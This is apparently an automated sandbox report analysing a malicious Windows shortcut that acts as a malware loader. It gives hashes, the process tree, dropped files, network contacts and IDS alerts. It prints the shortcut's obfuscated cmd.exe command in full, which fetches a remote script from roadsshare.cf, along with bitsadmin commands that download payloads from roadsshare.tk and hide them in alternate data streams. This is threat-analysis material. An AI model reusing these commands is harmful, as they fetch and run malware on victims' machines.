File name: | Arquivo514_04_10_2019.lnk |
Full analysis: | https://app.any.run/tasks/a5434c8c-cb8a-4f17-80f1-9fbe8c39855d |
Verdict: | Malicious activity |
Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
Analysis date: | October 09, 2019, 15:28:27 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/octet-stream |
File info: | MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=18, Archive, ctime=Sun Nov 21 02:24:03 2010, mtime=Sun Nov 21 02:24:03 2010, atime=Sun Nov 21 02:24:03 2010, length=302592, window=hidenormalshowminimized |
MD5: | FAC12693F40F950710681EB125E1058C |
SHA1: | 223E49D34DCB8366046181E308150BC54F9B3788 |
SHA256: | E925B17F09C667D4FEBEE88FEBA066C2DD80AE4148DB7B65968BC79C62FAF0A0 |
SSDEEP: | 24:8aS37Dpd9Q2CzA6Y+/qiCwBIDnQgRY0j6XZUN84o0w5vZ4O1BrTI:8aSrD3n0VBu0Qo/x4OX0 |
.lnk | | | Windows Shortcut (100) |
---|
MachineID: | jumper-pc |
---|---|
IconFileName: | %SystemRoot%\system32\imageres.dll |
CommandLineArguments: | /V /D /c "sEt SRM=%wYDIIindYDIIir%YDII\eYDIIXPYDIILoRYDIIeRYDII /cYDII,&&Set RZE=GeJDCWtOJDCWbjJDCWecJDCWt(JDCW'sJDCWcriJDCWpt:JDCWhttJDCWps:JDCW&&SEt hx76c22=KVIKVIroadsshare.cfKVI?07KVI') 2>&1 && sET/^p qstKftH="%RZE:JDCW=%%hx76c22:KVI=/%" <nul > %UserPROfile%\m7Ye4i4.Js 2>&1 2>&1|call %SRM:YDII=% %UserProfile%\m7Ye4i4.jS 2>&1|e^xi^T" |
RelativePath: | .\Windows\System32\cmd.exe |
Description: | gfjc |
LocalBasePath: | C:\Windows\System32\cmd.exe |
VolumeLabel: | - |
DriveType: | Fixed Disk |
TargetFileDOSName: | cmd.exe |
HotKey: | (none) |
RunWindow: | Show Minimized No Activate |
IconIndex: | 18 |
TargetFileSize: | 302592 |
ModifyDate: | 2010:11:21 04:24:03+01:00 |
AccessDate: | 2010:11:21 04:24:03+01:00 |
CreateDate: | 2010:11:21 04:24:03+01:00 |
FileAttributes: | Archive |
Flags: | IDList, LinkInfo, Description, RelativePath, CommandArgs, IconFile, Unicode, ExpString |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2724 | "C:\Windows\System32\cmd.exe" /V /D /c "sEt SRM=%wYDIIindYDIIir%YDII\eYDIIXPYDIILoRYDIIeRYDII /cYDII,&&Set RZE=GeJDCWtOJDCWbjJDCWecJDCWt(JDCW'sJDCWcriJDCWpt:JDCWhttJDCWps:JDCW&&SEt hx76c22=KVIKVIroadsshare.cfKVI?07KVI') 2>&1 && sET/^p qstKftH="%RZE:JDCW=%%hx76c22:KVI=/%" <nul > C:\Users\admin\m7Ye4i4.Js 2>&1 2>&1|call %SRM:YDII=% C:\Users\admin\m7Ye4i4.jS 2>&1|e^xi^T" | C:\Windows\System32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2580 | C:\Windows\system32\cmd.exe /S /D /c" sET/p qstKftH="%RZE:JDCW=%%hx76c22:KVI=/%" 0<nul 1>C:\Users\admin\m7Ye4i4.Js 2>&1" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3596 | C:\Windows\system32\cmd.exe /S /D /c" call %SRM:YDII=% C:\Users\admin\m7Ye4i4.jS 2>&1" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3700 | C:\Windows\system32\cmd.exe /S /D /c" exiT" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1452 | C:\Windows\eXPLoReR /c, C:\Users\admin\m7Ye4i4.jS | C:\Windows\explorer.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3572 | C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | C:\Windows\explorer.exe | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2476 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\m7Ye4i4.Js" | C:\Windows\System32\WScript.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 1073807364 Version: 5.8.7600.16385 | ||||
2128 | "C:\Windows\System32\bitsadmin.exe" /transfer 52298 /priority foreground https://roadsshare.tk/07/landoqeahjkya.jpg.zip C:\Users\Public\Libraries\trust\landoqeahjkya.jpg | C:\Windows\System32\bitsadmin.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: BITS administration utility Exit code: 0 Version: 7.5.7600.16385 (win7_rtm.090713-1255) | ||||
3472 | "C:\Windows\System32\cmd.exe" /c type "C:\Users\Public\Libraries\trust\landoqeahjkya.jpg" > "C:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkya.jpg"&&erase "C:\Users\Public\Libraries\trust\landoqeahjkya.jpg" | C:\Windows\System32\cmd.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1404 | "C:\Windows\System32\bitsadmin.exe" /transfer 85686 /priority foreground https://roadsshare.tk/07/landoqeahjkyb.jpg.zip C:\Users\Public\Libraries\trust\landoqeahjkyb.jpg | C:\Windows\System32\bitsadmin.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: BITS administration utility Exit code: 0 Version: 7.5.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2748 | cmd.exe | C:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkydx.gif | binary | |
MD5:6EA0310A175387E161817502FA576641 | SHA256:E85954435FE1FE9CB5C042BD035513111D07F3ED41DA5B8D61E3D0C1A42C7C23 | |||
2476 | WScript.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\roadsshare_cf[1].txt | xml | |
MD5:92A4E2E27AD2694E8D6CB5170F7DAC1B | SHA256:60FB36DEE00FDACA3FAA840863F22B12B38B25D3E52FF3548943846E8BD4F4C9 | |||
1636 | cmd.exe | C:\Users\Public\Libraries\trust\r1.log | text | |
MD5:DEE3DF2742A5AA5662ABF8637AC87A3A | SHA256:A368E5B71B293DB268F0B2981163333874EEFD26721E13645557B83C1CBC1E76 | |||
2848 | cmd.exe | C:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkyi.gif | binary | |
MD5:176B1DC2B5059B6704E1B35E3EDCC62D | SHA256:26B0095DFF7C50AE12F165A62B4BA954520B60E54D923432213D92AD8090D412 | |||
2496 | cmd.exe | C:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkyxa.~ | executable | |
MD5:D336F1B6EAAF81FDA7366C91FB050108 | SHA256:8D1AEF50A85D87063F2BD05FBD782111B14F0467FED70D8E5DFB86B6F61E6D09 | |||
3692 | cmd.exe | C:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkyxb.~ | binary | |
MD5:36F60D673EE6E65C8EEC16059B9ED634 | SHA256:17921585FADF23A31A0FFA7991878B614119A0105679FC1339AD2EFD745C35B1 | |||
3472 | cmd.exe | C:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkya.jpg | binary | |
MD5:57BBFB7DFBD710AAEF209BFF71B08A32 | SHA256:66C9C650E26635BF9E205E0EBB7B149A69A25F002917A1F9C5360149D423B30E | |||
2476 | WScript.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@roadsshare[1].txt | text | |
MD5:E247EEAB9CF342F02D15883BDCB2E717 | SHA256:B0A6B92EC436206029D8E81D777097E3B4A3B3C27DCE914542A1AA423E492590 | |||
2484 | cmd.exe | C:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkyc.jpg | binary | |
MD5:731CE6815B16DA24A9B41261C9C4CB35 | SHA256:40939CAF1D074EE825A2E1943F99D50AD6258C70612FA5F345FA35170A3D1BD1 | |||
3020 | cmd.exe | C:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkygx.gif | binary | |
MD5:4959533361EF3FD46F430D7F8F3411CA | SHA256:F42DD164EB8772BCE7B9DB81CEA30726DE4270961EFFA1EF582A0BD8539CA12B |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
— | — | 104.28.15.78:443 | roadsshare.tk | Cloudflare Inc | US | unknown |
2476 | WScript.exe | 104.27.131.120:443 | roadsshare.cf | Cloudflare Inc | US | shared |
2476 | WScript.exe | 104.27.130.120:443 | roadsshare.cf | Cloudflare Inc | US | shared |
Domain | IP | Reputation |
---|---|---|
roadsshare.cf |
| suspicious |
roadsshare.tk |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET INFO DNS Query for Suspicious .cf Domain |
2476 | WScript.exe | Potentially Bad Traffic | ET INFO Suspicious Domain (*.cf) in TLS SNI |
— | — | Potentially Bad Traffic | ET DNS Query to a .tk domain - Likely Hostile |